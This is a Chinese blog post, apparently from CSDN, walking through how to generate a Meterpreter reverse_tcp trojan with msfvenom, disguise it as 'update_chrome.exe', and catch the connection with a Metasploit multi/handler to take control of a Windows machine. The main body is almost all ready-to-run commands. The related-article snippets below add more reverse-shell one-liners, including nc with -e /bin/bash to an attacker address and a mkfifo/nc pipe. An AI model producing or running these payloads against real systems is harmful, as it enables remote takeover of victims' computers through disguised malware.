kali 反弹shell 远程操作Windows

最新推荐文章于 2025-05-15 20:30:40 发布

原创最新推荐文章于 2025-05-15 20:30:40 发布 · 2.8k 阅读

5 ·

CC 4.0 BY-SA版权

学习专栏收录该内容

27 篇文章

订阅专栏

博客介绍了利用Kali生成木马及监听登录Windows系统的方法。先在Kali终端用msfvenom命令，选择反向链接协议，指定本地监听IP和端口，生成exe格式木马文件。再打开msf控制台，设置相关参数监听端口，运行木马程序后可自动登录Windows系统。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、在kali终端执行下面命令，生成木马。
反向链接有多种协议：
payload:/windows/meterpreter/reverse_http

payload:/windows/meterpreter/reverse_https
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.72 LPORT=6666 -f exe > update_chrome.exe #名称随意

lhost: 本地监听IP

lport: 本地监听端口

-f 生成文件类型 exe 为Windows ，elf 为shell

二、打开msf控制台，监听本地端口。

use exploit /multi/handler

set lhost 192.168.1.72

set lport 6666

set payload windows/meterpreter/reverse_tcp

exploit

Windows 电脑上运行update_chrome.exe 程序后控制台自动登录Windows系统。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

天码行空的码

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

kali /mac 成功的反弹shell语句

没有故事

04-21

1617

2: 这条命令使用，kali 上执行的命令结果会在mac机器上显示出来，mac无法执行命令，kali上执行命令无结果，结果在mac上显示。8: 这个命令，在攻击机上执行，如果有报错会显示在受害者机器上，，攻击机上不显示报错语句。13:这条命令是同步两边执行的命令，不会显示结果。3: 命令执行成功，能反弹成功，但是输入命令无显示，不会用。14: 这条命令在攻击机上报错也不会同步到受害者机器上。该语句在监听机器上执行的语句会同步到被攻击机上。攻击机执行 ncat -u -lvp 3333。

kali获取Window的shell后续一直乱码

GUN_C的博客

11-15

2190

Linux在拿到window下shell 乱码

参与评论您还未登录，请先登录后发表或查看评论

cmd反弹shell提权

10-24

cmd反弹shell提权

使用Kali生成木马，渗透Windows系统

最新发布

2201_75459324的博客

05-15

854

使用Kali生成木马，渗透Windows系统

kali下使用远程桌面连接

p_utao的博客

10-28

5887

apt-get install rdesktop rdesktop IP:端口

kali linux2.0入侵安卓,kali2.0下入侵windows 10和android手机实战

weixin_39758041的博客

05-13

1087

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exeroot@kali:~# service postgresql startroot@...

网络安全 - Kali Linux反向端口连接&免杀

weixin_34307464的博客

06-09

1006

本篇文章适用学习，维护网络安全，做合法公民介绍：之前使用小七免杀工具包来作免杀（有空我就上传到网盘），免杀就是对PE（.bat、.exe等）文件中出现的特征码进行替换修改，方法有等价替换指令，字符串修改大小写、互补等。如今开源的东西比起手工来做，不仅免杀率高，速度快，功能多，而且会长期维护。下面我就介绍下 Hercules 工具：...

反弹Shell的基本操作

weixin_46831054的博客

11-26

1097

反弹shell定义：反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连

Linux反弹Shell总结

qq_45600801的博客

01-06

4443

反弹姿势 1、NC正向反弹靶机： nc -lvvp 靶机端口 -e /bin/sh 攻击机： nc 靶机ip 靶机端口 2、NC反向反弹（1）、可使用-e参数：靶机： nc x.x.x.x 8888 -e /bin/bash 攻击机： nc -lvvp 8888 （2）、NC，无-e参数反弹shell 有些版本的NC可能不支持-e选项，不能使用-e，则：方法一： rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc

简单易懂！反弹shell使用流程

weixin_54475173的博客

01-02

807

反弹shell使用流程，简单易上手

利用redis漏洞反弹shell

qq_54713392的博客

04-20

2320

利用redis漏洞反弹shell 攻击机：kali 192.168.32.132 目标机：centos7 192.168.32.144 （1）在目标机centos中安装redis服务器(redis-server) 解压，进入源码目录，然后编译(make、make install) 解压文件：tar -zxvf redis-2.8.17.tar.gz 移动解压文件执行命令：mv redis-2.8.17 /usr/local/redis 进入到目录下：cd /usr/local/redis 执行ma

渗透测试 ( 4 ) --- Meterpreter 命令详解

freeking101的博客

07-02

1万+

Meterpreter 是 Metasploit 框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.

Windows提权，网络安全编程基础

m0_60607895的博客

04-08

1055

msset payload windows/meterpreter/reverse_tcp # 设置payload，不同的木马设置不同的payload，设置payload时，要根据目标系统的系统位数设置相应的payload;set lhost 192.168.x.x # 我们的kali本机ipset lport 6666 # 我们的kali本机端口exploit使用msfvenom模块生成反弹木马：伪装成cmd.exemsfconsole # 在命令行里面输入命令，进入msf漏洞利用框架；

Windows的几种常用反弹shell方法

热门推荐

hackzkaq的博客

02-21

1万+

零基础学黑客，搜索公众号：白帽子左一简介：shell类似于DOS下的COMMAND.COM和后来的cmd.exe，它接收用户命令，然后调用相应的应用程序，也可以通俗的说是命令执行环境。分为交互式shell，与非交互式shell。交互shell就是shell等待你的输入，并且立即执行你提交的命令，这种模式被称作交互式是因为shell与用户进行交互。非交互shell不会与用户进行交互，而是用户读取存放在文件中的命令或者输入的命令，并且执行它们。当它读到文件的结尾，shell也就终止了。 1.nc反弹sh

linux反弹shell

arissa666的博客

11-27

717

下面是windows主机找到nc打开1.bat输入：nc 连接的IP地址端口受害主机是nc -lvvp 端口 -t -e /bin/bashkali系统连接。

如何使用kali来入侵(渗透)一台windows

QXXXD的博客

01-17

1418

网络安全产业就像一个江湖，各色人等聚集。相对于欧美国家基础扎实（懂加密、会防护、能挖洞、擅工程）的众多名门正派，我国的人才更多的属于旁门左道（很多白帽子可能会不服气），因此在未来的人才培养和建设上，需要调整结构，鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”，才能解人才之渴，真正的为社会全面互联网化提供安全保障。

关于反弹shell的学习

weixin_74020633的博客

06-14

945

反弹Shell（也称为反向Shell）是一种技术，通常用于远程访问和控制目标计算机。反弹Shell的工作原理是，目标计算机主动发起连接到攻击者的计算机，从而绕过一些常见的安全措施，如防火墙和NAT（网络地址转换）。这种技术常用于合法的远程管理和测试环境中，但也可能被恶意攻击者利用进行未授权的远程控制。通俗一点讲就是当存在一台攻击机和一台被攻击机时，攻击机（也就是客户端）连接被攻击机（服务端）叫做正向连接，那么反弹shell就是反向的连接，客户端为被攻击机，服务端为攻击机，由被攻击机连接攻击机。

手把手教你如何利用Meterpreter渗透Windows系统

weixin_34384557的博客

11-30

740

在这篇文章中，我们将跟大家介绍如何使用Meterpreter来收集目标Windows系统中的信息，获取用户凭证，创建我们自己的账号，启用远程桌面，进行屏幕截图，以及获取用户键盘记录等等。相关Payload Payload中包含有需要在远程系统中运行的恶意代码，而在Metasploit中Payload是一种特殊模块，它们能够以漏洞利用模块运行，并能够利用目标系统中的安全漏洞实施攻击。简而言之，这...

木马程序攻击+利用Windows内核漏洞提权

m0_71745258的博客

01-22

5384

再次声明，此学习路线主打就业方向，如果只是感兴趣，想成为什么黑客的朋友可以划走了！网络安全≠黑客很多人上来就说想做想入行网络安全，但是连方向都没搞清楚就开始学习，最终也只是会无疾而终！黑客是一个大的概念，里面包含了许多方向，不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇，主要是针对网络渗透方向，其他方向仅供参考，学习路线并不完全一样，有机会的话我再单独梳理。

kali接收不到反弹shell

12-28

### Kali Linux 无法接收反弹 Shell 的解决方案当遇到 Kali Linux 无法接收到反弹 Shell 的情况时，可能的原因涉及多个方面。以下是详细的排查和解决方法： #### 1. 检查防火墙设置确保目标机器（如 Ubuntu ...